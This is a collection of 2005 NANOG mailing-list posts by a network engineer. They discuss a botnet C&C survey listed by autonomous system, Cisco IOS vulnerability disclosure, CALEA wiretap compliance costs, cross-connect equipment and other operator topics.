The question of self promotion came back split down the middle. It was noted that IL CERT does a fantastic job seeing that there are no IL networks listed. Or none that are easily identifiable. YMMV. -M -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Gadi Evron Sent: Monday, August 15, 2005 8:22 AM To: nanog@merit.edu Subject: drone armies CC report - July/2005 Below is a periodic public report from the drone armies / botnets research and mitigation mailing list. For this report it should be noted that we base our analysis on the data we have accumulated from various sources. According to our incomplete analysis of information we have thus far, we now publish our regular reports, with some additional information. As of this month, any responsible party that wishes to receive information about botnet CC's in their net space can contact us and be added to our notification list. This month's survey is of 3629 unique domain with port or IP with port suspect CCs. This list is extracted from the BBL which currently has a historical base of 4464 reported CCs. Of the suspect CCs surveyed, 920 reported as Open, 3115 reported as closed and 393 issued resets to the survey instrument. Of the CCs listed by domain name, 2080 are mitigated via remapping. 276 ASNs report one or more open CCs. ASNs with 10 or more unresolved and open suspect CCs: ASNumber Responsible Party Count Open/Unresolved 21840 SAGONET-TPA - Sago Networks 53 34 30058 FDCSERVERS - FDCservers.net LL 65 32 30083 SERVER4YOU - Server4You Inc.41 28 12832 LYCOS-EUROPE Lycos Europe GmbH 31 27 23522 CIT-FOONET - CREATIVE INTERNET 25 23 174 COGENT Cogent/PSI 45 23 13680 AS13680 Hostway Corporation Ta 22 22 6461 MFNX MFN - Metromedia Fiber Ne 23 18 27595 ATRIVO-AS - Atrivo 27 16 15083 INFOLINK-MIA-US - Infolink Inf 19 15 4766 KIXS-AS-KR Korea Telecom41 15 8560 SCHLUND-AS Schlund + Partner A 28 14 27645 ASN-NA-MSG-01 - Managed Soluti 19 12 13237 LAMBDANET-AS European Backbone 15 12 1113 TUGNET Technische Universitaet 12 11 13301 UNITEDCOLO-AS Autonomous Syste 16 11 6939 HURRICANE - Hurricane Electric 12 10 16265 LEASEWEB LEASEWEB AS13 10 21698 NEBRIX-CA - Nebrix Communicati 25 10 Top 10 ASNs by total count: ASNumber Responsible Party Count Open/Unresolved 14742 INTERNAP-BLOCK-4 - Internap Ne118 1 14744 INTERNAP-BLOCK-4 - Internap Ne118 1 25761 STAMINUS-COMM - Staminus Commu69 25 10913 INTERNAP-BLK - Internap Networ67 1 30058 FDCSERVERS - FDCservers.net LL65 32 21840 SAGONET-TPA - Sago Networks 53 34 174 COGENT Cogent/PSI 45 23 4766 KIXS-AS-KR Korea Telecom 41 15 30083 SERVER4YOU - Server4You Inc. 41 28 3356 LEVEL3 Level 3 Communications 37 2 ASNs with 0ne or more open CCs: ASNumber Responsible Party 81CONCERT - MCNC Center of Commu 174 COGENT Cogent/PSI 237 MERIT-AS-14 - Merit Network In 701 ALTERNET-AS - UUNET Technologi 790 EUNETFI EUnet Finland 813 UUNET-AS1 - UUNET Technologies 1113 TUGNET Technische Universitaet 1221 ASN-TELSTRA Telstra Pty Ltd 1239 SPRINTLINK - Sprint 1267 ASN-INFOSTRADA Infostrada S.p. 1659 ERX-TANET-ASN1 Tiawan Academic 1668 AOL-ATDN - AOL Transit Data Ne 1784 GNAPS - Global NAPs Networks 1785 USLEC-ASN-1785 - USLEC Corp. 1955 HBONE-AS HUNGARNET 2042 ERX-JARING Malaysian institute 2108 CARNET-AS Croatian Academic an 2119 TELENOR-NEXTEL Telenor Interne 2501 JPNIC-ASBLOCK-AP JPNIC 2514 JPNIC-ASBLOCK-AP JPNIC 2527 JPNIC-ASBLOCK-AP JPNIC 2828 XO-AS15 - XO Communications 2856 BT-UK-AS BTnet UK Regional net 2907 ERX-SINET-AS National Center f 2914 VERIO - Verio Inc. 3064 AFFINITY-FTL - Affinity Intern 3215 AS3215 France Telecom Transpac 3246 TDCSONG TDC Song 3248 SIL-AT SILVER:SERVER GmbH 3265 XS4ALL-NL XS4ALL 3292 TDC TDC Data Networks 3301 TELIANET-SWEDEN TeliaNet Swede 3307 BANETELE-NORWAY BaneTele AS (f 3313 INET-AS I.NET S.p.A. 3344 KEWLIO-DOT-NET Kewlio.net Limi 3352 TELEFONICA-DATA-ESPANA Interne 3356 LEVEL3 Level 3 Communications 3462 HINET Data Communication Busin 3491 BTN-ASN -
RE: drone armies CC report - July/2005
Going further I think IL-CERT is doing a great service to the Internet community. Their alerts allow to responsible network admins to investigate and to preserve their networks clean of debris like spyware and trojans. The point is that aged data is an eternity when you're talking about botnets, worms, zombies, c/c's, etc which is what made me wonder why it was being posted in the first step. A month is a long time in botland. Yes, I'm all for clean networks. Yes, IL CERT does as good a job as any CERT, I'm sure. -M
RE: drone armies CC report - July/2005
the summaries are primarily useful for CC's that are still alive a month later even though plenty of notices have been sent to the relevant NOC's. in other words it's sort of like defcon's wall of sheep. i like the approach. Wall of sheep certainly is humorous, but IL CERT using this data as a shaming mechanism is, well, a shame. Once the NOC engages in an excercise of futility based on that list, it will never be read again and the effort ends up being more futile, which is another shame. It's a good project, but it got ripe before it was ready, IMO. BTW, are you vouching for the report?
Re: botnet reporting by AS - what about you?
Title: Re: botnet reporting by AS - what about you? Translation: This isn't a contact list for hundreds of asn's. -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED]] Sent: Fri Aug 12 22:43:47 2005 To: Richard A Steenbergen Cc: nanog list Subject: Re: botnet reporting by AS - what about you? What happened to replies off-list? Anyway, good point about actual ASN's, so here goes. Do you mean to tell me you can't find contact info for ANY of those ISPs on your own (like those ALTERNET guys, they're hard to track down)? Are you trying to start a service for notifing ISPs when they have drones behind them or something? Surely you don't expect to obtain a comprehensive list by posting a list of AS names and half chopped off descriptions to NANOG, without even including the AS numbers? We have contacts and listing, but we are trying to re-build, update and cover everything. New list with AS numbers below, as requested. If your AS is not listed and you are interested, drop me a note. I'd personally love more reporting services that will actually disclose information to the ISPs who can actually take action to help straighten out their customers. We have far too many people who sit around wringing their hands about how horrible the botnets are, but who won't tell anyone who can do anything about it out of a paranoid sense of security. I'm not sure this is the best way to go about that though. :) We are open for suggestions and this is not the *only* course of action we take. :) Thanks, Gadi. 17 PURDUE - Purdue University 25 UCB - University of California 27 UMDNET - University of Marylan 81 CONCERT - MCNC Center of Commu 137 ASGARR GARR Italian academic a 174 COGENT Cogent/PSI 209 ASN-QWEST - Qwest 210 WEST-NET-WEST - Utah Education 217 UMN-AGS-NET-AS - University of 224 UNINETT UNINETT The Norwegian 237 MERIT-AS-14 - Merit Network In 239 UTORONTO-AS - University of To 286 KPN KPN Internet Backbone AS 376 RISQ-AS - Reseau Interordinate 553 BELWUE Landeshochschulnetz Bad 577 BACOM - Bell Advanced Communic 680 DFN-IP service G-WiN 701 ALTERNET-AS - UUNET Technologi 702 AS702 MCI EMEA - Commercial IP 721 DLA-ASNBLOCK-AS - DoD Network 766 REDIRIS RedIRIS Autonomous Sys 786 JANET The JANET IP Service 790 EUNETFI EUnet Finland 812 ROGERS-CABLE - Rogers Cable In 813 UUNET-AS1 - UUNET Technologies 852 ASN852 - Telus Advanced Commun 1109 University of Salzburg 1113 TUGNET Technische Universitaet 1221 ASN-TELSTRA Telstra Pty Ltd 1239 SPRINTLINK - Sprint 1249 FIVE-COLLEGES-AS - Five Colleg 1267 ASN-INFOSTRADA Infostrada S.p. 1653 SUNET SUNET Swedish University 1659 ERX-TANET-ASN1 Tiawan Academic 1668 AOL-ATDN - AOL Transit Data Ne 1680 NetVision Ltd. 1767 IHETSDATANET - Indiana Higher 1781 KAIST-DAEJEON-AS-KR Korea Adva 1784 GNAPS - Global NAPs Networks 1785 USLEC-ASN-1785 - USLEC Corp. 1955 HBONE-AS HUNGARNET 2042 ERX-JARING Malaysian institute 2108 CARNET-AS Croatian Academic an 2116 ASN-CATCHCOM Catch Communicati 2119 TELENOR-NEXTEL Telenor Interne 2259 FR-U-STRASBOURG FR 2381 WISCNET1-AS - University of Wi 2501 JPNIC-ASBLOCK-AP JPNIC 2514 JPNIC-ASBLOCK-AP JPNIC 2527 JPNIC-ASBLOCK-AP JPNIC 2614 ROEDUNET Romanian Education Ne 2637 GEORGIA-TECH - Georgia Institu 2764 AAPT AAPT Limited 2828 XO-AS15 - XO Communications 2852 CESNET2 Czech National Researc 2856 BT-UK-AS BTnet UK Regional net 2907 ERX-SINET-AS National Center f 2914 VERIO - Verio Inc. 3064 AFFINITY-FTL - Affinity Intern 3112 OARNET-AS-1 - OARnet 3212 TRIERA Triera Internet 3215 AS3215 France Telecom Transpac 3240 SEKTORNET Sektornet DK Minist 3246 TDCSONG TDC Song 3248 SIL-AT SILVER:SERVER GmbH 3257 TISCALI-BACKBONE Tiscali Intl 3265 XS4ALL-NL XS4ALL 3269 ASN-IBSNAZ TELECOM ITALIA 3292 TDC TDC Data Networks 3301 TELIANET-SWEDEN TeliaNet Swede 3304 SCARLET Scarlet Belgium 3307 BANETELE-NORWAY BaneTele AS (f 3313 INET-AS I.NET S.p.A. 3320 DTAG Deutsche Telekom AG 3323 NTUA National Technical Univer 3344 KEWLIO-DOT-NET Kewlio.net Limi 3352 TELEFONICA-DATA-ESPANA Interne 3356 LEVEL3 Level 3 Communications 3462 HINET Data Communication Busin 3491 BTN-ASN - Beyond The Network A 3561 SAVVIS - Savvis 3602 SPRINT-CA-AS - Sprint Canada I 3659 CLAREMONT - The Claremont Coll 3701 NERONET - Oregon Joint Graduat 3741 AFRINIC African Network Inform 3758 ERX-SINGNET SingNet 3786 ERX-DACOMNET DACOM Corporation 3801 MISNET - Mikrotec Internet Ser 4134 CHINANET-BACKBONE No.31 Jin-ro 4148 ACTCOM ACTCOM - Active Communi 4230 Embratel 4314 I-55-INTERNET-SERVICES-INC - I 4323 TWTC - Time Warner Telecom 4355 ERMS-EARTHLNK - EARTHLINK INC 4364 IGLOU - IgLou Internet Service 4436 AS-NLAYER - nLayer Communicati 4513 Globix Corporation 4589 EASYNET Easynet Group Plc 4618 INET-TH-AS Internet Thailand C 4628 ASN-PACIFIC-INTERNET-IX Pacifi 4637 REACH Reach Network Border AS 4645 ASN-HKNET-AP HKNet Co. Ltd 4670 HYUNDAI-KR Shinbiro 4685 ASAHI-NET Asahi Net 4713 OCN NTT Communications Corpora 4725 ODN JAPAN TELECOM CO. LTD. 4732 DION KDDI
Re: botnet reporting by AS - what about you?
Title: Re: botnet reporting by AS - what about you? I was on it and unsubscribed. They wouldn't disclose the collection or validation process at that time. This made it useless for the most part as its hard to act on someones word without some idea of how they are getting their data and avoiding collateral damage. I'm not saying there aren't valid zombies on it, but my criteria for a list that identifies rogues includes trust. I have lists I felt were more trustworthy than DA. Things may have changed. Martin -Original Message- From: Christopher L. Morrow [mailto:[EMAIL PROTECTED]] Sent: Fri Aug 12 23:56:53 2005 To: Fergie (Paul Ferguson) Cc: nanog@merit.edu Subject: Re: botnet reporting by AS - what about you? On Sat, 13 Aug 2005, Fergie (Paul Ferguson) wrote: Chris, I can assure you that the Drone Army project is not run that way, and is quite useful, effective, etc. The folks behind the DA Project are certainly professionals... ...and the infromation is quite useable, parse-able, and genuine. cool, among the 800k+ complaints we see a month (yes, 800k) there are quite a few completely useless ones :( Anything sent in as a complaint has to have complete and useful information, else it's hard/impossible to action properly. It'd help if the format it was sent in was also machine parseable :) With 800k+ complaints/month I'm not sure people want to spend time figuring each one out, a script/machine should be doing as much as possible. - ferg -- Christopher L. Morrow [EMAIL PROTECTED] wrote: perhaps we could back up and ask: 1) why are you not using the arin/ripe/apnic/japnic/krnic/lacnic poc's for these asn's? certainly some are not up to date, but there are a large number that are... 2) what is this for again? 3) are you planning on sending something to these poc's? 4) what are you planning on sending to them? 5) how often should they expect to see something, and from 'whom'? 6) looked at the INCH working group in IETF, thought about using some of these evolving standards for your alerts/messags/missives? 7) please don't send in bmp files of traceroutes (make the info you send in complete and usable... 'I saw a bot on ip 12' is not useable, as an fyi) -Chris -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet [EMAIL PROTECTED] or [EMAIL PROTECTED] ferg's tech blog: http://fergdawg.blogspot.com/
RE: Cisco crapaganda
[ SNIP ] But I found more. It seems that a guy using the name FX has been publishing stuff about Cisco heap exploits for years now. I found his slides from a presentation made at BlackHat Las Vegas in 2002. Lots of juicy detail. And I found a long document translated from Chinese about modern information/economic warfare. If people want to be up to date, imagine the unimaginable. -M
RE: FCC Issues Rule Allowing FBI to Dictate Wiretap-Friendly Design for In ternet Services
I think the EFF is missing the important part of the wish list items. The punch list is law. If you are talking about the applicability of CALEA, that's different. The wish list items aren't for wiretaps, but defining as many things as possible as non-content. Its important for network operators because they will end up doing a lot more work digging through packets for non-content information, and important for lawyers because it lessens the legal requirements for non-content information. What is the expectation of privacy of non-content information? ObNANOG: Archicture, operation, cost. CALEA doesn't dictate architecture. Political issues aside, and attempting to stick with operations as this is NANOG, the major issue for carriers regardless of size is that this that compliance is an expense. The cost of an implementation for a medium sized carrier is upwards of 1MM. Maintenance runs at ~200K per year for a similiar installation not coupling in legal and operations costs. That is IF you even get an order. The brunt of the work is at the tier1's. This is like DDOS. LEC's have to do it, but they frequently misinterpret the requirements and scale and end up spending money they never had to. Misinterpretation is a big problem for CALEA, technically speaking. -M
RE: FCC Issues Rule Allowing FBI to Dictate Wiretap-Friendly Design for In ternet Services
On Sat, 6 Aug 2005, Matt Ghali wrote: On Sat, 6 Aug 2005, Joshua Brady wrote: the FBI can call the NSA anytime they want without a tap order and get them to trigger ECHELON when your voice is apparant on any line. Not me, I wrapped my cellphone in tin foil. shiny side out one hopes? Seriously though, I'm not a telco/phone person, but I was once told that the phone switch equipment does the tap 'automagically' to special ds-1 facilities inn LEA-land... which means the cell phone can be wrapped in anything you'd like. If the calls get completed a copy is silently made to the right folks (not the nsa, they aren't LEA). Sort of. It has to be provisioned like any other service, (that's most of the X.25 portion that people were talking about) but it's a protocol(J-STD) enabled between the carrier and the LEA. It can be DS1, or it could be VPN. The capture is near real time content and data. -M
RE: DACS Equipment
I have a number of mux DS-3s coming in - right now they drop straight into aggregation routers. What I like to do is drop them into a local DACS and comb them out to DS-1s and then re-mux them back on to internal DS-3s. This will let me move circuits around digitally inside our equipment. You're looking for digital cross connect, for the most part. You should take a look at the Cisco line i.e. 15454 et. al. You can bring in ds3, groom on the backplane, and send out ds3. I've used the 15454 et. al. in production and for your stated purpose it's more economical than buying some big iron. You may also want to consider your physical layer architecture if you do this i.e. interconnecting vs. cross connecting so that you have test access where you need it. IIRC, the 15454 et. al. will do passive monitoring at a line level and will SNMP alert on outages down to the smallest mux' unit. Very nice for the IP NOC. -M
RE: OT: Cisco.com password reset.
Now imagine if instead of 2655 users it was 1-1.5million, Sure, 1.5MM. That's a lot. Don't get owned in the first place. Todays CSCO market cap is 124.0B. This is not our problem. -M
RE: Cisco IOS Exploit Cover Up
For those who like to keep abreast of security issues, there are interesting developments happening at BlackHat with regards to Cisco IOS and its vulnerability to arbitrary code executions. I apologize for the article itself being brief and lean on technical details, but allow me to say that it does represent a real problem (as in practical and confirmed): http://blogs.washingtonpost.com/securityfix/2005/07/mending_a_ hole_.html Yes, practical _and_ confirmed, but you'll never get $vendor to admit it, which is the problem to begin with. -M
RE: Cisco IOS Exploit Cover Up
..and of course: Cisco Denies Router Vulnerability Claims [snip] Of course. That's how a broken vuln system works. :-) The major flaw is that the vendor decides who gets to know about a vulnerability. This causes an insecurity in the system because $vendor is dealing with people usually more qualified than themselves to make a decision on who needs to know and make one independant of revenue-- . $vendor is probably not the best person to decide who gets on the secret-15 lists et. al. -M
RE: compromized host list available
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Rick Wesson Sent: Wednesday, July 20, 2005 7:32 PM To: nanog@merit.edu Subject: compromized host list available Folks, I've developed a tool to pull together a bunch of information from DNSRBLs and mix it with a BGP feed, the result is that upon request I can generate a report of all the compromised hosts on your network as seen by various DNSRBLs. reports are available daily in pdf, text, csv, and excel. they are all a bit chunky but should be helpful. contact me off list, if you would like to get a daily report for your ASN. You will be required to prove you are associated with and responsible for the ASN you want a report for. The report are free so this isn't a commercial =) honestly I hope the stuff helps. What about collateral damage? -M
RE: London incidents
All this while I was trying unsuccessfully to use my mobile to ring the office. Some cell relays were temporarily shut to prevent a remote detonation of additional explosives. Cellular remotes seem to be a favorite of Al Qaeda and others. -M
RE: SORBS deaggregation
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of David Barak Sent: Wednesday, July 06, 2005 6:51 PM To: nanog@merit.edu Subject: SORBS deaggregation --- Alex Rubenstein [EMAIL PROTECTED] wrote: [ SNIP ] I would've made this a private note to y'all except: Would you mind using Was: if you're going to change the subject? I'd appreciate it. I bet others would too... Hint: killfiles. -M
RE: Enable BIND cache server to resolve chinese domain name?
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Steve Gibbard Sent: Monday, July 04, 2005 1:20 AM To: [EMAIL PROTECTED] Subject: Re: Enable BIND cache server to resolve chinese domain name? On Mon, 4 Jul 2005, Mark Andrews wrote: [ SNIP ] That doesn't mean a competing system wouldn't work, for those who are using it. They'd just be limited in who they could talk to, and that generally wouldn't be very appealing. Are you just making noise here, Steve? That doesn't really say anything outside of status quo. That said, a big country implementing a new DNS root on a national scale may not have that problem. The telecom world is already full of systems that don't cross national borders. In the US case, think of all the cell phones that have international dialing turned off by default, That's a poor example. That's between the subscriber and their carrier, not a technical limitation. and all the 800 numbers whose owners probably aren't at all bothered by their inability to receive calls from other countries. That's also a poor example since there are work arounds for this technical issue. A system that would limit my ability to talk to people in other countries doesn't sound very appealing to me. I know. I know. Don't feed the trolls. -M
RE: ISP phishing
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Brad Knowles Sent: Thursday, June 30, 2005 12:48 PM To: Peter Corlett Cc: [EMAIL PROTECTED] Subject: Re: ISP phishing At 12:20 PM + 2005-06-29, Peter Corlett wrote: Sure Alice has control. Last week, I told my ISP where to stick their shoddy service and took my business elsewhere. You're assuming that there are always alternatives available for the entire world population. While there may usually be alternatives available in the most advanced western societies, you would be surprised at the types of places where you would think that there have to be alternatives, but in fact there aren't any. It also assumes that there are real differences in the alternatives in civilized society. In fact, you can only spell HTTP so many ways. There are less discernable differences these days. you would be surprised at the types of places where you would think that there have to be alternatives, but in fact there aren't any. There aren't alternatives because of the cost. In other cases the national climate i.e. protectionist of the incumbent or desire to hold it closely for political reasons i.e. China. -M
RE: md5 for bgp tcp sessions
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Todd Underwood Sent: Thursday, June 23, 2005 5:57 AM To: Richard A Steenbergen Cc: nanog@merit.edu Subject: Re: md5 for bgp tcp sessions ras, all, On Thu, Jun 23, 2005 at 12:14:12AM -0400, Richard A Steenbergen wrote: On Wed, Jun 22, 2005 at 10:04:09PM -0400, Todd Underwood wrote: rolling out magic code because your vendor tells you to is a bad idea; That's mostly the result of the calamitous failure in vulnerability release methodology, not Operator stupidity. -M
RE: [NON-OPERATIONAL] Re: NANOG Evolution
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Daniel Golding Sent: Friday, June 17, 2005 1:30 PM To: Randy Bush; Betty Burke Cc: nanog@merit.edu; [EMAIL PROTECTED] Subject: [NON-OPERATIONAL] Re: NANOG Evolution Randy, People's employers are posted at http://www.nanog.org/candidates05.html. It gets a bit complicated because some folks work at infrastructure companies - collocation/peering or DNS (Mark, Bill, Josh, Marty). It shouldn't be complicated. I think members are looking for Operator experience. I don't think it's too hard to make that easily discernable as long as it's fair. One thing that nags me a bit is we're not doing this at an actual NANOG meeting. Candidates don't get to discuss their qualifications and make a pitch to get elected. It's hard to determine if someone is suitable for the responsibilities if you cannot hear/see/get a feel for where they are coming from. This goes to leveling of the playing field. You may have a cruddy bio, but be a great candidate, and vice versa. How do you propose we get out the information as to why we should be elected to represent the group at large? [ dead horse ] Lastly, 6.2.1 Program Committee Membership and Selection is not acceptable, IMO, for the group at large. It should be normalized much like the Mailing List Admins. This disables the ability of the Steering Committee to lead. Ultimately, the SC is elected to represent the membership and carry out it's will and that should be uniformly actionable across the board in order for the SC to be taken seriously by the group and by Merit. -M